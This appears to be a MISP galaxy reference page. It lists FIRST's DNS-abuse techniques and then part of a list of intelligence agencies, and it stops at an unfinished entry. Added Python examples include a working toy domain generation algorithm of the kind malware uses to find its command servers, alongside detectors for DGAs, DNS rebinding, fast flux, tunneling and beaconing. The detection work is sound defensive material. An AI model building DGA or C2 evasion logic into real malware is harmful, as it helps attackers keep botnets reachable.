FIRST.org - Andrey Meshkov (AdGuard) - Ángel González (INCIBE-CERT) - Angela Matlapeng (bwCSIRT) - Benedict Addis (Shadowserver) - Brett Carr (Nominet) - Carlos Alvarez (ICANN; founding member) - David Ruefenacht (Infoguard) - Gabriel Andrews (FBI) - John Todd (Quad9; current co-chair of DNS Abuse SIG) - Jonathan Matkowsky (RiskIQ / Microsoft; former co-chair) - Jonathan Spring (CISA; current co-chair of DNS Abuse SIG) - Mark Henderson (IRS) - Mark Svancarek (Microsoft) - Merike Kaeo (Double Shot Security) - Michael Hausding (SWITCH-CERT; former co-chair, current FIRST board member) - Peter Lowe (DNSFilter; current co-chair of DNS Abuse SIG) - Shoko Nakai (JPCERT/CC) - Swapneel Patnekar (Shreshta IT) - Trey Darley (FIRST board; founding member)

DGAs

DGAs - Domain Generation Algorithm

The tag is: misp-galaxy:first-dns="DGAs"

Table 1625. Table References

Links

https://attack.mitre.org/techniques/T1568/002/
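As an added example (not part of the FIRST matrix or of MISP), the block below shows both sides of the technique: a hypothetical date-seeded DGA of the kind T1568.002 describes, where the bot and its controller derive the same daily domain list from a shared seed, and a simple lexical classifier that flags DGA-looking names in a domain list. The seed, the thresholds and the reserved `.example` suffix are assumptions for illustration, not parameters of any real malware family; the classifier deliberately goes beyond the single toy generator and scores any domain list.

```python
import hashlib
import math
from collections import Counter
from datetime import date


def toy_dga(day_iso: str, seed: str = "example-seed", count: int = 16) -> list[str]:
    """Hypothetical DGA (assumption, not a real family): bot and C2 derive the
    same daily domain list from a shared seed and the date, so a defender who
    recovers the algorithm can pre-compute and sinkhole tomorrow's domains."""
    day = date.fromisoformat(day_iso)            # validates the date format
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}:{day.isoformat()}:{i}".encode()).digest()
        length = 12 + digest[0] % 8              # 12..19 characters per label
        label = "".join(chr(ord("a") + b % 26) for b in digest[1:1 + length])
        domains.append(f"{label}.example")       # reserved TLD, constructed data
    return domains


def shannon_entropy(text: str) -> float:
    """Bits per character; random-looking labels score close to log2(#symbols)."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def dga_features(domain: str) -> dict:
    """Lexical features of the leftmost label only (the part a DGA generates)."""
    label = domain.lower().split(".")[0]
    vowels = sum(ch in "aeiou" for ch in label)
    run = longest_run = 0
    for ch in label:
        if ch.isalpha() and ch not in "aeiou":
            run += 1
            longest_run = max(longest_run, run)
        else:
            run = 0
    return {
        "length": len(label),
        "entropy": shannon_entropy(label) if label else 0.0,
        "vowel_ratio": vowels / len(label) if label else 0.0,
        "longest_consonant_run": longest_run,
    }


def looks_like_dga(domain: str) -> bool:
    """Flag when at least three of four heuristics fire (thresholds are assumptions)."""
    f = dga_features(domain)
    hits = sum([
        f["length"] >= 12,
        f["entropy"] >= 3.3,
        f["vowel_ratio"] < 0.3,
        f["longest_consonant_run"] >= 4,
    ])
    return hits >= 3


def flag_dga_domains(domains: list[str]) -> list[str]:
    """Return the subset of a domain list that the heuristics flag."""
    return [d for d in domains if looks_like_dga(d)]


if __name__ == "__main__":
    today = toy_dga("2024-01-01")
    print("generated:", today[:3], "...")
    print("flagged  :", len(flag_dga_domains(today)), "of", len(today))
    print("benign   :", flag_dga_domains(["google.example", "wikipedia.example"]))
```

Lexical heuristics like these catch random-looking families but miss wordlist-based DGAs, which is why production detection pairs them with NXDOMAIN volume per client and with reproducing the family's real algorithm once it has been reverse-engineered.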

Domain name compromise

Wrongfully taking control of a domain name from its rightful holder. Compromised domains can be used for different kinds of malicious activity, such as sending spam or phishing, distributing malware, or botnet command and control.

The tag is: misp-galaxy:first-dns="Domain name compromise"

Table 1626. Table References

Links

https://www.icann.org/groups/ssac/documents/sac-007-en

Lame delegations

Lame delegations occur as a result of expired nameserver domains allowing attackers to take control of the domain resolution by re-registering this expired nameserver domain.

The tag is: misp-galaxy:first-dns="Lame delegations"

Table 1627. Table References

Links

https://blog.apnic.net/2021/03/16/the-prevalence-persistence-perils-of-lame-nameservers/

DNS cache poisoning

DNS cache poisoning - also known as DNS spoofing, is a type of cyber attack in which an attacker corrupts a DNS resolver's cache by injecting false DNS records, causing the resolver to return records controlled by the attacker.

The tag is: misp-galaxy:first-dns="DNS cache poisoning"

Table 1628. Table References

Links

https://capec.mitre.org/data/definitions/142.html

DNS rebinding

DNS rebinding - a type of attack where a malicious website directs a client to a local network address, allowing the attacker to bypass the same-origin policy and gain access to the victim’s local resources.

The tag is: misp-galaxy:first-dns="DNS rebinding"

Table 1629. Table References

Links

https://capec.mitre.org/data/definitions/275.html
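Two controls that break the rebinding chain described above, as an added example that is not part of the FIRST matrix: a resolver-side filter that refuses answers mapping an external name to a private, loopback or link-local address (the behaviour resolvers such as dnsmasq offer as "stop DNS rebind"), and a service-side Host header allowlist, which works because the browser still sends the attacker's hostname in the Host header when it reaches the internal service. The internal suffixes, the allowlist and the addresses are constructed for the example.

```python
import ipaddress

# Assumptions for the example: names under these suffixes legitimately resolve
# to internal addresses; every other name is treated as external.
INTERNAL_SUFFIXES = (".internal.example", ".corp.example")
# Hostnames the local service expects in the HTTP Host header (constructed).
ALLOWED_HOSTS = {"admin.internal.example", "localhost", "127.0.0.1", "::1"}


def is_internal_address(addr: str) -> bool:
    """True for any address a rebinding attack would want to reach: RFC 1918,
    loopback, link-local, unspecified, multicast, and IPv4-mapped IPv6 forms
    of those. Unparsable input is treated as internal (fail closed)."""
    try:
        ip = ipaddress.ip_address(addr.strip("[]"))
    except ValueError:
        return True
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                     # ::ffff:10.0.0.5 -> 10.0.0.5
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast)


def is_internal_name(qname: str) -> bool:
    name = qname.lower().rstrip(".")
    return name.endswith(INTERNAL_SUFFIXES)     # endswith accepts a tuple


def filter_rebinding_answers(qname: str, answers: list[str]) -> list[str]:
    """Resolver-side control: drop A/AAAA answers that point an external name
    at an internal address, so the attacker's second resolution never reaches
    the client. Internal names keep all of their answers."""
    if is_internal_name(qname):
        return list(answers)
    return [a for a in answers if not is_internal_address(a)]


def host_header_allowed(host_header: str) -> bool:
    """Service-side control: a rebinding request carries the attacker's domain
    in Host, so an allowlist of the hostnames we serve rejects it."""
    value = host_header.strip().lower()
    if value.startswith("[") and "]" in value:  # [::1]:8080
        host = value[1:value.index("]")]
    elif value.count(":") == 1:                 # host:port
        host = value.rsplit(":", 1)[0]
    else:
        host = value
    return host.rstrip(".") in ALLOWED_HOSTS


if __name__ == "__main__":
    print(filter_rebinding_answers("attacker.example",
                                   ["93.184.216.34", "127.0.0.1", "192.168.1.10"]))
    print(host_header_allowed("attacker.example"), host_header_allowed("admin.internal.example:8080"))
```

The resolver filter alone is not sufficient: a service reachable by IP, or via a name under an allowed internal suffix that the attacker can influence, still needs the Host check, and both checks should be combined with authentication on the internal service.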

DNS server compromise

Attacker gains administrative privileges on an open recursive DNS server, authoritative DNS server, organizational recursive DNS server, or ISP-operated recursive DNS server.

The tag is: misp-galaxy:first-dns="DNS server compromise"

Stub resolver hijacking

The attacker compromises the Operating System of a computer or a phone with malicious code that intercepts and responds to DNS queries with rogue or malicious responses.

The tag is: misp-galaxy:first-dns="Stub resolver hijacking"

Local recursive resolver hijacking

Consumer Premise Equipment (CPE), such as home routers, often provide DNS recursion on the local network. If the CPE device is compromised, the attacker can change the recursive resolver behavior; for example, by changing responses.

The tag is: misp-galaxy:first-dns="Local recursive resolver hijacking"

On-path DNS attack

Attackers intercept communication between a user and a DNS server and provide different destination IP addresses pointing to malicious sites.

The tag is: misp-galaxy:first-dns="On-path DNS attack"

Table 1630. Table References

Links

https://www.imperva.com/learn/application-security/dns-hijacking-redirection/

DoS against the DNS

Multiple systems sending malicious traffic to a target at the same time.

The tag is: misp-galaxy:first-dns="DoS against the DNS"

DNS as a vector for DoS

Adversaries may attempt to cause a denial of service by reflecting a high volume of network traffic to a target. This type of network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Two prominent protocols that have enabled reflection amplification floods are DNS and NTP, though the use of several others in the wild has been documented. These reflection and amplification floods can be directed against components of the DNS, like authoritative nameservers, rendering them unresponsive.

The tag is: misp-galaxy:first-dns="DNS as a vector for DoS"

Table 1631. Table References

Links

https://attack.mitre.org/techniques/T1498/002/

Dynamic DNS resolution

Dynamic DNS resolution (as obfuscation technique) - Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address or port number the malware uses for command and control.

The tag is: misp-galaxy:first-dns="Dynamic DNS resolution"

Table 1632. Table References

Links

https://attack.mitre.org/techniques/T1568/

Dynamic DNS resolution: Fast flux

Dynamic DNS resolution: Fast flux (as obfuscation technique) - Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name with multiple IP addresses assigned to it which are swapped with high frequency using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.

The tag is: misp-galaxy:first-dns="Dynamic DNS resolution: Fast flux"

Table 1633. Table References

Links

https://attack.mitre.org/techniques/T1568/001/
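The two signals in the description above, many addresses behind one name and a short TTL, are what a passive-DNS consumer looks for. The block below is an added example (not part of the FIRST matrix) that scores constructed passive-DNS observations for fast flux, adding a third requirement, spread across several networks, so that a CDN rotating a few addresses in one block with a low TTL is not flagged. The /24 prefix is used as a stand-in for ASN diversity, the thresholds are assumptions, and the addresses come from the reserved 198.18.0.0/15 benchmarking range so they are obviously synthetic.

```python
import ipaddress
from collections import defaultdict

# Constructed passive-DNS observations, not real infrastructure:
# (qname, rdata, ttl). A real feed would also carry first/last-seen times.
PDNS_RECORDS = (
    [("flux.example", f"198.18.{i}.{i + 1}", 180) for i in range(8)]   # 8 IPs, 8 /24s
    + [("cdn.example", "198.19.1.10", 60),                             # 3 IPs, one /24
       ("cdn.example", "198.19.1.11", 60),
       ("cdn.example", "198.19.1.12", 60),
       ("www.example", "198.19.2.5", 86400)]                            # static host
)


def network_key(ip: str) -> str:
    """Coarse network-diversity proxy: /24 for IPv4, /48 for IPv6.
    A production tool would map each address to its ASN instead."""
    addr = ipaddress.ip_address(ip)
    prefix = 24 if addr.version == 4 else 48
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def score_fast_flux(records, min_ips=5, min_networks=3, max_ttl=300):
    """Group observations by name and flag names that combine many addresses,
    many networks and a short TTL. Thresholds are assumptions for the example."""
    by_name = defaultdict(list)
    for qname, rdata, ttl in records:
        by_name[qname.lower().rstrip(".")].append((rdata, ttl))

    result = {}
    for qname, obs in by_name.items():
        ips = {rdata for rdata, _ in obs}
        nets = {network_key(ip) for ip in ips}
        min_ttl = min(ttl for _, ttl in obs)
        result[qname] = {
            "unique_ips": len(ips),
            "unique_networks": len(nets),
            "min_ttl": min_ttl,
            "fast_flux": (len(ips) >= min_ips
                          and len(nets) >= min_networks
                          and min_ttl <= max_ttl),
        }
    return result


if __name__ == "__main__":
    for name, info in score_fast_flux(PDNS_RECORDS).items():
        print(f"{name:14} ips={info['unique_ips']} nets={info['unique_networks']} "
              f"ttl={info['min_ttl']} fast_flux={info['fast_flux']}")
```

Legitimate anycast and CDN deployments can also show many addresses with low TTLs, so a finding from this scoring is a lead for enrichment (ASN ownership, hosting type, domain age), not a verdict on its own.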

Infiltration and exfiltration via the DNS

Exfiltration via the DNS requires a delegated domain or, if the domain does not exist in the public DNS, the operation of a resolver preloaded with that domain’s zone file information and configured to receive and respond to the queries sent by the compromised devices.

The tag is: misp-galaxy:first-dns="Infiltration and exfiltration via the DNS"

Malicious registration of (effective) second level domains

For example, before attacking a victim, adversaries purchase or register domains from an ICANN-accredited registrar that can be used during targeting. See also CAPEC-630.

The tag is: misp-galaxy:first-dns="Malicious registration of (effective) second level domains"

Table 1634. Table References

Links

https://capec.mitre.org/data/definitions/630.html

Creation of malicious subdomains under dynamic DNS providers

Before attacking a victim, adversaries purchase or create domains from an entity other than a registrar or registry that provides subdomains under domains they own and control.

The tag is: misp-galaxy:first-dns="Creation of malicious subdomains under dynamic DNS providers"

Table 1635. Table References

Links

https://en.wikipedia.org/wiki/Dynamic_DNS

Compromise of a non-DNS server to conduct abuse

Internet attack infrastructure is a broad category, and this covers any non-DNS server. Many compromised servers, such as web servers or mail servers, interact with the DNS or may be instrumental in conducting DNS abuse. For example, compromised mail servers are one technique that may be used to send phishing emails.

The tag is: misp-galaxy:first-dns="Compromise of a non-DNS server to conduct abuse"

Spoofing or otherwise using unregistered domain names

In a context where a domain name is expected (such as the From header in mail or a URL in a web page or message body), supplying a domain name not controlled by the attacker and that is not controlled by or registered to a legitimate registrant.

The tag is: misp-galaxy:first-dns="Spoofing or otherwise using unregistered domain names"

Spoofing of a registered domain

In a context where a domain name is expected (such as the From header in mail or a URL in a web page or message body), supplying a domain name not controlled by the attacker and that is in fact controlled by or registered to a legitimate registrant.

The tag is: misp-galaxy:first-dns="Spoofing of a registered domain"

DNS tunneling

DNS tunneling - tunneling another protocol over DNS - The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal expected traffic.

The tag is: misp-galaxy:first-dns="DNS tunneling"

Table 1636. Table References

Links

https://attack.mitre.org/techniques/T1071/004/

DNS beacons - C2 communication

DNS beacons - C2 communication - Successive or periodic DNS queries to a command & control server, either to exfiltrate data or await further commands from the C2.

The tag is: misp-galaxy:first-dns="DNS beacons - C2 communication"
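The three entries above (infiltration and exfiltration via the DNS, DNS tunneling, and DNS beacons) leave related traces in resolver query logs, so one added example serves all three; it is not part of the FIRST matrix. It parses constructed log lines of the form `timestamp client qname qtype`, groups them by registrable domain (assumed here to be the last two labels, which a real tool would replace with the Public Suffix List), and flags a domain with many unique high-entropy subdomains as tunneling or exfiltration and a client querying a domain at near-constant intervals as a beacon. The thresholds are assumptions.

```python
import math
import statistics
from collections import Counter, defaultdict
from datetime import datetime

ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"   # base32-style payload alphabet


def constructed_log() -> list[str]:
    """Synthetic resolver log lines 'timestamp client qname qtype' (constructed)."""
    lines = []
    # 12 exfiltration queries, each carrying a different 32-character payload label
    for i in range(12):
        payload = ALPHABET[i:] + ALPHABET[:i]
        lines.append(f"2024-05-01T10:00:{i:02d} 10.0.0.5 {payload}.exfil.example TXT")
    # A beacon: one host queries the same name exactly every 60 seconds
    for i in range(10):
        lines.append(f"2024-05-01T10:{i:02d}:00 10.0.0.7 update.cdn-update.example A")
    # Ordinary, irregular browsing by the first host
    for ts, name in [("10:00:03", "www"), ("10:00:17", "mail"), ("10:02:45", "login"),
                     ("10:05:02", "www"), ("10:05:03", "www")]:
        lines.append(f"2024-05-01T{ts} 10.0.0.5 {name}.corp.example A")
    return lines


def entropy(text: str) -> float:
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


def registrable(qname: str, depth: int = 2) -> str:
    """Assumed registrable domain: last two labels (use the PSL in practice)."""
    return ".".join(qname.split(".")[-depth:])


def parse_line(line: str):
    ts, client, qname, qtype = line.split()
    return datetime.fromisoformat(ts), client, qname.lower().rstrip("."), qtype


def analyze(lines, tunnel_min_subdomains=8, tunnel_min_entropy=3.0,
            beacon_min_queries=5, beacon_max_cv=0.1):
    """Per registrable domain: subdomain churn and entropy (tunneling/exfil)
    and per-client interval regularity (beaconing)."""
    by_domain = defaultdict(list)
    for line in lines:
        ts, client, qname, qtype = parse_line(line)
        by_domain[registrable(qname)].append((ts, client, qname, qtype))

    findings = {}
    for domain, recs in by_domain.items():
        subs = {q[:-len(domain) - 1] for _, _, q, _ in recs if q != domain}
        ent = [entropy(s.replace(".", "")) for s in subs]
        mean_ent = sum(ent) / len(ent) if ent else 0.0
        txt_share = sum(t in ("TXT", "NULL") for *_, t in recs) / len(recs)

        per_client = defaultdict(list)
        for ts, client, _, _ in recs:
            per_client[client].append(ts)
        beacon_clients = []
        for client, stamps in per_client.items():
            if len(stamps) < beacon_min_queries:
                continue
            stamps.sort()
            gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
            mean_gap = statistics.mean(gaps)
            # coefficient of variation of the inter-query interval: ~0 means clockwork
            if mean_gap > 0 and statistics.pstdev(gaps) / mean_gap <= beacon_max_cv:
                beacon_clients.append(client)

        findings[domain] = {
            "queries": len(recs),
            "unique_subdomains": len(subs),
            "mean_entropy": mean_ent,
            "txt_share": txt_share,
            "tunnel": len(subs) >= tunnel_min_subdomains and mean_ent >= tunnel_min_entropy,
            "beacon_clients": beacon_clients,
            "beacon": bool(beacon_clients),
        }
    return findings


if __name__ == "__main__":
    for domain, info in analyze(constructed_log()).items():
        print(f"{domain:20} tunnel={info['tunnel']} beacon={info['beacon']} "
              f"subs={info['unique_subdomains']} H={info['mean_entropy']:.2f}")
```

Note that a tunnel is also a beacon if its client polls on a timer, as the exfil domain in the constructed data does; CDN and telemetry domains produce regular polling too, so beacon findings should be scored against a domain allowlist and the query-type mix (TXT, NULL and very long names are the stronger tunneling indicators).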

Intelligence Agencies

List of intelligence agencies.

Intelligence Agencies is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Graham87 - Frietjes - Narky Blert - Pkbwcgs - Girth Summit - InternetArchiveBot - AnomieBOT - GreenMeansGo - MusikBot - Trappist the monk

General Directorate of Intelligence

General Directorate of Intelligence (GDI) – د استخباراتو لوی ریاست

The tag is: misp-galaxy:intelligence-agency="General Directorate of Intelligence"

General Directorate of Intelligence is also known as:

  • د استخباراتو لوی ریاست

Table 1637. Table References

Links

https://en.wikipedia.org/wiki/General_Directorate_of_Intelligence

National Intelligence Service (Albania)

State Intelligence Service (SHISH) – Sherbimi Informativ Shteteror

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (Albania)"

National Intelligence Service (Albania) is also known as:

  • Sherbimi Informativ Shteteror

Table 1638. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(Albania)

Dirección de Observaciones Judiciales

Directorate of Judicial Surveillance (DOJ) – Dirección de Observaciones Judiciales

The tag is: misp-galaxy:intelligence-agency="Dirección de Observaciones Judiciales"

Table 1639. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_de_Observaciones_Judiciales

Servicio Federal de Lucha contra el Narcotráfico

Federal Counternarcotics Service (SEFECONAR) – Servicio Federal de Lucha contra el Narcotráfico

The tag is: misp-galaxy:intelligence-agency="Servicio Federal de Lucha contra el Narcotráfico"

Table 1640. Table References

Links

https://en.wikipedia.org/wiki/Servicio_Federal_de_Lucha_contra_el_Narcotr%C3%A1fico

Inteligencia de la Gendarmería Nacional Argentina

Argentine National Gendarmerie Intelligence (SIGN) – Inteligencia de la Gendarmería Nacional Argentina

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Gendarmería Nacional Argentina"

Table 1641. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Gendarmer%C3%ADa_Nacional_Argentina

Dirección Nacional de Inteligencia Estratégica Militar

National Directorate of Strategic Military Intelligence (DNIEM) – Dirección Nacional de Inteligencia Estratégica Militar

The tag is: misp-galaxy:intelligence-agency="Dirección Nacional de Inteligencia Estratégica Militar"

Table 1642. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_Nacional_de_Inteligencia_Estrat%C3%A9gica_Militar

Inteligencia del Servicio Penitenciario Federal

Federal Penitentiary Service Intelligence – Inteligencia del Servicio Penitenciario Federal

The tag is: misp-galaxy:intelligence-agency="Inteligencia del Servicio Penitenciario Federal"

Table 1643. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_del_Servicio_Penitenciario_Federal

Inteligencia de la Policía de Seguridad Aeroportuaria

Airport Security Police Intelligence – Inteligencia de la Policía de Seguridad Aeroportuaria

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Policía de Seguridad Aeroportuaria"

Table 1644. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Polic%C3%ADa_de_Seguridad_Aeroportuaria

Dirección Nacional de Inteligencia Criminal

National Directorate of Criminal Intelligence (DNIC) – Dirección Nacional de Inteligencia Criminal

The tag is: misp-galaxy:intelligence-agency="Dirección Nacional de Inteligencia Criminal"

Table 1645. Table References

Links

https://en.wikipedia.org/wiki/Direcci%C3%B3n_Nacional_de_Inteligencia_Criminal

Inteligencia de la Policía Federal Argentina

Argentine Federal Police Intelligence – Inteligencia de la Policía Federal Argentina

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Policía Federal Argentina"

Table 1646. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Polic%C3%ADa_Federal_Argentina

Inteligencia de la Policía Bonaerense

Buenos Aires Police Intelligence (SIPBA) – Inteligencia de la Policía Bonaerense

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Policía Bonaerense"

Table 1647. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Polic%C3%ADa_Bonaerense

Inteligencia de la Prefectura Naval Argentina

Argentine Naval Prefecture Intelligence (SIPN) – Inteligencia de la Prefectura Naval Argentina

The tag is: misp-galaxy:intelligence-agency="Inteligencia de la Prefectura Naval Argentina"

Table 1648. Table References

Links

https://en.wikipedia.org/wiki/Inteligencia_de_la_Prefectura_Naval_Argentina

Unidad de Inteligencia Financiera (Argentina)

Financial Intelligence Unit (UIF) – Unidad de Inteligencia Financiera

The tag is: misp-galaxy:intelligence-agency="Unidad de Inteligencia Financiera (Argentina)"

Unidad de Inteligencia Financiera (Argentina) is also known as:

  • Unidad de Inteligencia Financiera

Table 1649. Table References

Links

https://en.wikipedia.org/wiki/Unidad_de_Inteligencia_Financiera_(Argentina)

Central de Reunión de Inteligencia Militar

Military Intelligence Collection Center (CRIM) – Central de Reunión de Inteligencia Militar

The tag is: misp-galaxy:intelligence-agency="Central de Reunión de Inteligencia Militar"

Table 1650. Table References

Links

https://en.wikipedia.org/wiki/Central_de_Reuni%C3%B3n_de_Inteligencia_Militar

Servicio de Inteligencia del Ejército (Argentina)

Army Intelligence Service (SIE) – Servicio de Inteligencia del Ejército

The tag is: misp-galaxy:intelligence-agency="Servicio de Inteligencia del Ejército (Argentina)"

Servicio de Inteligencia del Ejército (Argentina) is also known as:

  • Servicio de Inteligencia del Ejército

Table 1651. Table References

Links

https://en.wikipedia.org/wiki/Servicio_de_Inteligencia_del_Ej%C3%A9rcito_(Argentina)

Servicio de Inteligencia Naval (Argentina)

Naval Intelligence Service (SIN) – Servicio de Inteligencia Naval

The tag is: misp-galaxy:intelligence-agency="Servicio de Inteligencia Naval (Argentina)"

Servicio de Inteligencia Naval (Argentina) is also known as:

  • Servicio de Inteligencia Naval

Table 1652. Table References

Links

https://en.wikipedia.org/wiki/Servicio_de_Inteligencia_Naval_(Argentina)

Servicio de Inteligencia de la Fuerza Aérea (Argentina)

Air Force Intelligence Service (SIFA) – Servicio de Inteligencia de la Fuerza Aérea

The tag is: misp-galaxy:intelligence-agency="Servicio de Inteligencia de la Fuerza Aérea (Argentina)"

Servicio de Inteligencia de la Fuerza Aérea (Argentina) is also known as:

  • Servicio de Inteligencia de la Fuerza Aérea

Table 1653. Table References

Links

https://en.wikipedia.org/wiki/Servicio_de_Inteligencia_de_la_Fuerza_A%C3%A9rea_(Argentina)

National Security Service (Armenia)

National Security Service (NSS)

The tag is: misp-galaxy:intelligence-agency="National Security Service (Armenia)"

Table 1654. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Service_(Armenia)

Australian Security Intelligence Organisation

Australian Security Intelligence Organisation (ASIO)

The tag is: misp-galaxy:intelligence-agency="Australian Security Intelligence Organisation"

Table 1655. Table References

Links

https://en.wikipedia.org/wiki/Australian_Security_Intelligence_Organisation

Australian Secret Intelligence Service

Australian Secret Intelligence Service (ASIS)

The tag is: misp-galaxy:intelligence-agency="Australian Secret Intelligence Service"

Table 1656. Table References

Links

https://en.wikipedia.org/wiki/Australian_Secret_Intelligence_Service

Australian Signals Directorate

Australian Signals Directorate (ASD)

The tag is: misp-galaxy:intelligence-agency="Australian Signals Directorate"

Table 1657. Table References

Links

https://en.wikipedia.org/wiki/Australian_Signals_Directorate

Australian Geospatial-Intelligence Organisation

Australian Geospatial-Intelligence Organisation (AGO)

The tag is: misp-galaxy:intelligence-agency="Australian Geospatial-Intelligence Organisation"

Table 1658. Table References

Links

https://en.wikipedia.org/wiki/Australian_Geospatial-Intelligence_Organisation

Defence Intelligence Organisation

Defence Intelligence Organisation (DIO)

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence Organisation"

Table 1659. Table References

Links

https://en.wikipedia.org/wiki/Defence_Intelligence_Organisation

Office of National Intelligence (Australia)

Office of National Intelligence (ONI)

The tag is: misp-galaxy:intelligence-agency="Office of National Intelligence (Australia)"

Table 1660. Table References

Links

https://en.wikipedia.org/wiki/Office_of_National_Intelligence_(Australia)

Heeresnachrichtenamt

Heeresnachrichtenamt (HNA): Army Intelligence Office

The tag is: misp-galaxy:intelligence-agency="Heeresnachrichtenamt"

Heeresnachrichtenamt is also known as:

  • Army Intelligence Office

Table 1661. Table References

Links

https://en.wikipedia.org/wiki/Heeresnachrichtenamt

Ministry of Defence (Austria)

Abwehramt (AbwA): Counter-Intelligence Office

The tag is: misp-galaxy:intelligence-agency="Ministry of Defence (Austria)"

Ministry of Defence (Austria) is also known as:

  • Counter-Intelligence Office

Table 1662. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_Defence_(Austria)#Subordinate_departments

State Security and Intelligence Directorate

Direktion Staatsschutz und Nachrichtendienst (DSN): State Security and Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="State Security and Intelligence Directorate"

Table 1663. Table References

Links

https://en.wikipedia.org/wiki/State_Security_and_Intelligence_Directorate

State Security Service of the Republic of Azerbaijan

State Security Service (Dövlət Təhlükəsizliyi Xidməti)

The tag is: misp-galaxy:intelligence-agency="State Security Service of the Republic of Azerbaijan"

Table 1664. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_of_the_Republic_of_Azerbaijan

Foreign Intelligence Service (Azerbaijan)

Foreign Intelligence Service (Xarici Kəşfiyyat Xidməti)

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service (Azerbaijan)"

Table 1665. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_(Azerbaijan)

Financial Monitoring Service (Azerbaijan)

Financial Monitoring Service (Maliyyə Monitorinqi Xidməti)

The tag is: misp-galaxy:intelligence-agency="Financial Monitoring Service (Azerbaijan)"

Table 1666. Table References

Links

https://en.wikipedia.org/wiki/Financial_Monitoring_Service_(Azerbaijan)

Special Branch (Bahamas)

Security and Intelligence Branch (SIB)

The tag is: misp-galaxy:intelligence-agency="Special Branch (Bahamas)"

Table 1667. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch#Bahamas

Financial Intelligence Unit (Bahamas)

Financial Intelligence Unit (FIU)

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit (Bahamas)"

Table 1668. Table References

Links

https://en.wikipedia.org/wiki/Financial_Intelligence_Unit

National Crime Intelligence Agency (NCIA)

National Crime Intelligence Agency (NCIA)

The tag is: misp-galaxy:intelligence-agency="National Crime Intelligence Agency (NCIA)"

National Security Agency (Bahrain)

NSA – National Security Agency

The tag is: misp-galaxy:intelligence-agency="National Security Agency (Bahrain)"

Table 1669. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Agency_(Bahrain)

National Committee for Intelligence Coordination

National Committee for Intelligence Coordination

The tag is: misp-galaxy:intelligence-agency="National Committee for Intelligence Coordination"

Table 1670. Table References

Links

https://en.wikipedia.org/wiki/National_Committee_for_Intelligence_Coordination

National Security Intelligence

National Security Intelligence (NSI)

The tag is: misp-galaxy:intelligence-agency="National Security Intelligence"

Table 1671. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Intelligence

Special Security Force

Special Security Force – Intelligence Bureau (SSF-IB)

The tag is: misp-galaxy:intelligence-agency="Special Security Force"

Table 1672. Table References

Links

https://en.wikipedia.org/wiki/Special_Security_Force

National Security Affairs Cell

National Security Affairs Cell

The tag is: misp-galaxy:intelligence-agency="National Security Affairs Cell"

Table 1673. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Affairs_Cell

Special Branch, Bangladesh Police

Special Branch (SB)

The tag is: misp-galaxy:intelligence-agency="Special Branch, Bangladesh Police"

Table 1674. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch,_Bangladesh_Police

Detective Branch, Bangladesh Police

Detective Branch (DB)

The tag is: misp-galaxy:intelligence-agency="Detective Branch, Bangladesh Police"

Table 1675. Table References

Links

https://en.wikipedia.org/wiki/Detective_Branch,_Bangladesh_Police

Police Bureau of Investigation

Police Bureau of Investigation (PBI)

The tag is: misp-galaxy:intelligence-agency="Police Bureau of Investigation"

Table 1676. Table References

Links

https://en.wikipedia.org/wiki/Police_Bureau_of_Investigation

Criminal Investigation Department (Bangladesh)

Criminal Investigation Department (CID)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigation Department (Bangladesh)"

Table 1677. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigation_Department_(Bangladesh)

Counter Terrorism and Transnational Crime

Counter Terrorism and Transnational Crime (CTTC)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism and Transnational Crime"

Table 1678. Table References

Links

